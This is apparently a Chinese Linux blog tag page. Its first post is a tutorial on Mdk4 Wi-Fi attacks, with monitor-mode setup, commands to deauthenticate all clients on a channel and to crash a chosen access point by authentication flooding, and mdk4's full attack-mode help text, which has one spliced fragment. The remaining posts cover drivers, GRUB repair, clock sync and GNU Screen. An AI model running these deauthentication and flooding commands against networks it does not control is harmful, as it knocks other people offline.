跳到主要内容

10 篇博文 含有标签「Linux」

Linux

查看所有标签

Mdk4 无线攻击

· 阅读需 10 分钟

本篇内容仅用于学习和测试,本人遵纪守法。

Mdk3 已经不在维护,且它无法攻击 5Ghz 频段的 WiFi,而 Mdk4 加入了 5Ghz 频段的支持,当然用新不用旧。在实践中,WPA3 协议的 WIFI 对 Deauth 和泛洪攻击似乎免疫,多次尝试均是如此。而 WPA2 以及更低级的协议的 WIFI 能够轻易被攻击,产生显著效果。

安装

安装 aircrack-ngmdk4 ,Manjaro 可通过以下命令安装

yay -S aircrack-ng mdk4

使用

启用监听模式

sudo airmon-ng start wlp8s0

得到 wlp8s0mon 作为监听接口,执行攻击命令时均使用监听接口。

扫描无线网络

对 2.4Ghz 频段的 WiFi 扫描

sudo airodump-ng wlp8s0mon

对 5Ghz 频段的 WiFi 扫描,其中参数 a 表示 5Ghz 的 802.11a 标准,也可以是 bg ,分别代表 802.11b 和 802.11g,他俩的频段为 2.4 Ghz

sudo airodump-ng --band a wlp8s0mon

常用情景

Deauthentication 攻击,断掉信道为 11 无线网络的全部客户端连接。

sudo mdk4 wlp8s0mon d -c 11

身份验证攻击,攻击 BSSID 为 AE:15:5d:ad:40:9b 的接入点,使其崩溃重启

sudo mdk4 wlp8s0mon a -a AE:15:5d:ad:40:9b

攻击模式

一般也就用 a 和 d,用信标攻击太离谱太明显

ATTACK MODE b: Beacon Flooding
  Sends beacon frames to show fake APs at clients.
  This can sometimes crash network scanners and even drivers!
ATTACK MODE a: Authentication Denial-Of-Service
  Sends authentication frames to all APs found in range.
  Too many clients can freeze or reset several APs.
ATTACK MODE p: SSID Probing and Bruteforcing
  Probes APs and checks for answer, useful for checking if SSID has been correctly decloaked and if AP is in your sending range.
  Bruteforcing of hidden SSIDs with or without a wordlist is also available.
ATTACK MODE d: Deauthentication and Disassociation
  Sends deauthentication and disassociation packets to stations based on data traffic to disconnect all clients from an AP.
ATTACK MODE m: Michael Countermeasures Exploitation
  Sends random packets or re-injects duplicates on another QoS queue to provoke Michael Countermeasures on TKIP APs.
  AP will then shutdown for a whole minute, making this an effective DoS.
ATTACK MODE e: EAPOL Start and Logoff Packet Injection
  Floods an AP with EAPOL Start frames to keep it busy with fake sessions and thus disables it to handle any legitimate clients. Or logs off clients by injecting fake EAPOL Logoff messages.
ATTACK MODE s: Attacks for IEEE 802.11s mesh networks
  Various attacks on link management and routing in mesh networks
  Flood neighbors and routes, create black holes and divert traffic!
ATTACK MODE w: WIDS Confusion
  Confuse/Abuse Intrusion Detection and Prevention Systems by cross-connecting clients to multiple WDS nodes or fake rogue APs.
ATTACK MODE f: Packet Fuzzer
  A simple packet fuzzer with multiple packet sources and a nice set of modifiers. Be careful!
ATTACK MODE x: Poc Testing
  Proof-of-concept of WiFi protocol implementation vulnerability, to test whether the device has wifi vulnerabilities.
  It may cause the wifi connection to be disconnected or the target device to crash.

攻击参数

mdk4 <interface> <attack_mode> [attack_options]
mdk4 <interface in> <interface out> <attack_mode> [attack_options]
	ATTACK MODE b: Beacon Flooding
	  Sends beacon frames to generate fake APs at clients.
	  This can sometimes crash network scanners and drivers!
	      -n <ssid>
		 Use SSID <ssid> instead of randomly generated ones
	      -a
		 Use also non-printable caracters in generated SSIDs
		 and create SSIDs that break the 32-byte limit
	      -f <filename>
		 Read SSIDs from file
	      -v <filename>
		 Read MACs and SSIDs from file. See example file!
	      -t <adhoc>
		 -t 1 = Create only Ad-Hoc network
		 -t 0 = Create only Managed (AP) networks
		 without this option, both types are generated
	      -w <encryptions>
		 Select which type of encryption the fake networks shall have
		 Valid options: n = No Encryption, w = WEP, t = TKIP (WPA), a = AES (WPA2)
		 You can select multiple types, i.e. "-w wta" will only create WEP and WPA networks
	      -b <bitrate>
		 Select if 11 Mbit (b) or 54 MBit (g) networks are created
		 Without this option, both types will be used.
	      -m
		 Use valid accesspoint MAC from built-in OUI database
	      -h
		 Hop to channel where network is spoofed
		 This is more effective with some devices/drivers
		 But it reduces packet rate due to channel hopping.
	      -c <chan>
		 Create fake networks on channel <c		ATTACK MODE f: Packet Fuzzer
	  A simple packet fuzzer with multiple packet sources
	  and a nice set of modifiers. Be careful!han>. If you want your card to
		 hop on this channel, you have to set -h option, too.
	      -i <HEX>
		 Add user-defined IE(s) in hexadecimal at the end of the tagged parameters
	      -s <pps>
		 Set speed in packets per second (Default: 50)

	ATTACK MODE a: Authentication Denial-Of-Service
	  Sends authentication frames to all APs found in range.
	  Too many clients can freeze or reset several APs.
	      -a <ap_mac>
		 Only test the specified AP
	      -m
		 Use valid client MAC from built-in OUI database
	      -i <ap_mac>
		 Perform intelligent test on AP
		 This test connects clients to the AP and reinjects sniffed data to keep them alive.
	      -s <pps>
		 Set speed in packets per second (Default: unlimited)

	ATTACK MODE p: SSID Probing and Bruteforcing
	  Probes APs and checks for answer, useful for checking if SSID has
	  been correctly decloaked and if AP is in your sending range.
	  Bruteforcing of hidden SSIDs with or without a wordlist is also available.
	      -e <ssid>
		 SSID to probe for
	      -f <filename>
		 Read SSIDs from file for bruteforcing hidden SSIDs
	      -t <bssid>
		 Set MAC address of target AP
	      -s <pps>
		 Set speed (Default: 400)
	      -b <character sets>
		 Use full Bruteforce mode (recommended for short SSIDs only!)
		 You can select multiple character sets at once:
		 * n (Numbers:   0-9)
		 * u (Uppercase: A-Z)
		 * l (Lowercase: a-z)
		 * s (Symbols: ASCII)
	      -p <word>
		 Continue bruteforcing, starting at <word>.
	      -r <channel>
		 Probe request tests (mod-musket)

	ATTACK MODE d: Deauthentication and Disassociation
	  Sends deauthentication and disassociation packets to stations
	  based on data traffic to disconnect all clients from an AP.
	      -w <filename>
		 Read file containing MACs not to care about (Whitelist mode)
	      -b <filename>
		 Read file containing MACs to run test on (Blacklist Mode)
	      -s <pps>
		 Set speed in packets per second (Default: unlimited)
	      -x
		 Enable full IDS stealth by matching all Sequence Numbers
		 Packets will only be sent with clients' addresses
	      -c [chan,chan,...,chan[:speed]]
		 Enable channel hopping. When -c h is given, mdk4 will hop an all
		 14 b/g channels. Channel will be changed every 3 seconds,
		 if speed is not specified. Speed value is in milliseconds!
	      -E <AP ESSID>
		 Specify an AP ESSID to attack.
	      -B <AP BSSID>
		 Specify an AP BSSID to attack.
	      -S <Station MAC address>
		 Specify a station MAC address to attack.
		  -W <Whitelist Station MAC address>
		 Specify a whitelist station MAC.

	ATTACK MODE m: Michael Countermeasures Exploitation
	  Sends random packets or re-injects duplicates on another QoS queue
	  to provoke Michael Countermeasures on TKIP APs.
	  AP will then shutdown for a whole minute, making this an effective DoS.
	      -t <bssid>
		 Set target AP, that runs TKIP encryption
	      -j
		 Use the new QoS exploit which only needs to reinject a few packets instead
		 of the random packet injection, which is unreliable but works without QoS.
	      -s <pps>
		 Set speed in packets per second (Default: 400)
	      -w <seconds>
		 Wait <seconds> between each random packet burst (Default: 10)
	      -n <count>
		 Send <count> random packets per burst (Default: 70)

	ATTACK MODE e: EAPOL Start and Logoff Packet Injection
	  Floods an AP with EAPOL Start frames to keep it busy with fake sessions
	  and thus disables it to handle any legitimate clients.
	  Or logs off clients by injecting fake EAPOL Logoff messages.
	      -t <bssid>
		 Set target WPA AP
	      -s <pps>
		 Set speed in packets per second (Default: 400)
	      -l
		 Use Logoff messages to kick clients

	ATTACK MODE s: Attacks for IEEE 802.11s mesh networks
	  Various attacks on link management and routing in mesh networks.
	  Flood neighbors and routes, create black holes and divert traffic!
	      -f <type>
		 Basic fuzzing tests. Picks up Action and Beacon frames from the air, modifies and replays them:
		 The following modification types are implemented:
		 1: Replay identical frame until new one arrives (duplicate flooding)
		 2: Change Source and BSSID (possibly resulting in Neighbor Flooding)
		 3: Cut packet short, leave 802.11 header intact (find buffer errors)
		 4: Shotgun mode, randomly overwriting bytes after header (find bugs)
		 5: Skript-kid's automated attack trying all of the above randomly :)
	      -b <impersonated_meshpoint>
		 Create a Blackhole, using the impersonated_meshpoint's MAC address
		 mdk4 will answer every incoming Route Request with a perfect route over the impersonated node.
	      -p <impersonated_meshpoint>
		 Path Request Flooding using the impersonated_meshpoint's address
		 Adjust the speed switch (-s) for maximum profit!
	      -l
		 Just create loops on every route found by modifying Path Replies
	      -s <pps>
		 Set speed in packets per second (Default: 100)
	      -n <meshID>
		 Target this mesh network

	ATTACK MODE w: WIDS Confusion
	  Confuse/Abuse Intrusion Detection and Prevention Systems by
	  cross-connecting clients to multiple WDS nodes or fake rogue APs.
	  Confuses a WDS with multi-authenticated clients which messes up routing tables
	      -e <SSID>
		 SSID of target WDS network
	      -c [chan,chan,...,chan[:speed]]
		 Enable channel hopping. When -c h is given, mdk4 will hop an all
		 14 b/g channels. Channel will be changed every 3 seconds,
		 if speed is not specified. Speed value is in milliseconds!
	      -z
		 activate Zero_Chaos' WIDS exploit
		 (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
	      -s <pps>
		 Set speed in packets per second (Default: 100)

	ATTACK MODE f: Packet Fuzzer
	  A simple packet fuzzer with multiple packet sources
	  and a nice set of modifiers. Be careful!
	  mdk4 randomly selects the given sources and one or multiple modifiers.
	      -s <sources>
		 Specify one or more of the following packet sources:
		 a - Sniff packets from the air
		 b - Create valid beacon frames with random SSIDs and properties
		 c - Create CTS frames to broadcast (you can also use this for a CTS DoS)
		 p - Create broadcast probe requests
	      -m <modifiers>
		 Select at least one of the modifiers here:
		 n - No modifier, do not modify packets
		 b - Set destination address to broadcast
		 m - Set source address to broadcast
		 s - Shotgun: randomly overwrites a couple of bytes
		 t - append random bytes (creates broken tagged parameters in beacons/probes)
		 c - Cut packets short, preferably somewhere in headers or tags
		 d - Insert random values in Duration and Flags fields
	      -c [chan,chan,...,chan[:speed]]
		 Enable channel hopping. When -c h is given, mdk4 will hop an all
		 14 b/g channels. Channel will be changed every 3 seconds,
		 if speed is not specified. Speed value is in milliseconds!
	      -p <pps>
		 Set speed in packets per second (Default: 250)
	
	ATTACK MODE x: Poc Testing
	  Proof-of-concept of WiFi protocol implementation vulnerability,
	  to test whether the device has wifi vulnerabilities.
	  It may cause the wifi connection to be disconnected or the target device to crash.
	  	  -s <pps>
		   Set speed in packets per second (Default: unlimited)
		  -c [chan,chan,...,chan[:speed]]
		  	Enable channel hopping. When -c h is given, mdk4 will hop an all
			14 b/g channels. Channel will be changed every 3 seconds,
			if speed is not specified. Speed value is in milliseconds!
		  -v <vendor>
		    file name in pocs dir, default test all.
		  -A <AP MAC>
		    set an AP MAC
		  -S <Station MAC>
		    set a station MAC.

RTL8812BU驱动安装

· 阅读需 1 分钟

已经有人做出了安装包放在了AUR仓库,他用到了但是却没有把 linux-headers 写在 PKGBUILD 里面,导致安装失败。使用需要先手动安装这个这个依赖,再安装驱动才能成功。

yay -S linux-headers rtl88x2bu-dkms-git

完成以后即可搜索到 WiFi,这个螃蟹卡在实验室的台式电脑上似乎无法进入监听模式,后续用笔记本再捣鼓一下。

GRUB 引导

· 阅读需 4 分钟

最常见的问题,就是 Windows 更新之后,引导被覆盖了,开机直接进入 Windows ,这时需要重新安装 GRUB ,而不是更新引导项。其次,就是在安装其他基于 Linux 的系统时,需要添加引导项,例如通过 Brunch Framework 安装 Chrome OS 时,可能需要禁用独显或是添加一些其他的内核参数,这时也需要更新 GRUB 配置使之生效。

注意:

  • Manjaro 不支持 SecureBoot,如果开启了,请在 BIOS 关闭。
  • 磁盘模式为 RAID 的话,Manjaro 中无法识别到机械硬盘(如果是双硬盘,1SSD+1HDD),请设为 AHCI 模式。
  • 若因修改为 AHCI 模式而进不去 Windows,可多次强行关机,进入安全模式,再重启即可正常进入系统。
  • 如果问题解决不了,多看看官方Wiki

重建引导

当需要重建引导时,下面命令将在 /dev/nvme0n1 安装 grub,这里应确保安装在正确的位置。

sudo grub-install /dev/nvme0n1

更新引导

下面命令使上一步的配置生效,重启见效。对 grub 配置做了什么修改都需要 update-grub,无论是安装还是什么其他的。

sudo update-grub

场景

1. 开机没有进入GRUB引导页面

如果直接进了 Windows 的话,需要重建引导:

  1. 插U盘,开机进入 Manjaro 安装盘的临时系统里。
  2. 终端运行 sudo manjaro-chroot -a,并选择那个进不去的 Manjaro 系统,这里比较迷惑人,如果想要选择序号 0 的选项,应该输入 1 ,应该是个 bug。如果只有一个,可能就不需要选择。
  3. 如果前面执行顺利,现在执行 ls 应该就列出的是 “丢失” 的系统的根目录了,不信可以去 home 文件夹看看。接下来要重建引导。
  4. 执行 sudo grub-install /dev/nvme0n1,安装完成。
  5. 执行 sudo update-grub 更新配置,使之生效。
  6. 使用 efibootmgr 可按顺序列出启动项,若出现了 manjaro 说明一切顺利。
  7. 执行 exit 退出,可以重启看到熟悉的 Manjaro Grub 了。

2. 确定GRUB没问题,进不去Windows

如果保证引导没问题,就是直接进了 Manjaro ,压根没有给选择的机会。

检查 /etc/default/grubGRUB_TIMEOUT 的值是否为 0,它是给你选系统的倒计时秒数,0 秒肯定不行啊。再检查一下 GRUB_TIMEOUT_STYLE 是否为 hidden,这里应该设置为 menu,以便默认显示菜单。然后重新生成主配置文件并重新启动以检查它是否有效。

与 Windows 系统时间不同步

· 阅读需 1 分钟

Windows 将本地硬件时间作为设定时区(如 UTC+8)的区时,而 Linux 默认将其作为 (UTC+0) 时间。每次进入Linux,系统会读取BIOS时间,然后+8,作为本地时间显示出来。每次进入Windows,系统会读取BIOS时间,直接作为本地时间显示。

两种方式,二选一,个人倾向于在Windows中修改设置,将硬件时间识别为UTC。

在 Linux 修改设置

使用以下命令关闭UTC时间

sudo timedatectl set-local-rtc 1

在 Windows 修改设置

Reg add HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v RealTimeIsUniversal /t REG_DWORD /d 1

GNU Screen 的基础使用

· 阅读需 3 分钟
Hanasaki
Hanasaki
阿巴阿巴阿巴

又到了寒假,又到了容易忘记打卡的时候,在学校宿舍还可以有人吆喝一声记得打卡,到了家里如果遇上忙的东西搞到半夜,然后倒头就睡,第二天就只能手写检讨了。我是绝不会让这种情况发生的!!

之前在 GitHub Action 上用着也一直不顺,也不知道是他服务器的问题还是咋,总遇到ETIMEOUT 的问题,可能他网络全天处于高峰期吧,不过没事,本白嫖怪办法多的是~

直接在服务器上部署吧,相信用腾讯的服务器不会网络超时的!

GNU Screen 的安装

Screen 顾名思义和窗口有关,实际上就是命令行版本的Windows资源管理器,管理着窗口的创建、连接、分割、隐藏、后台运行等。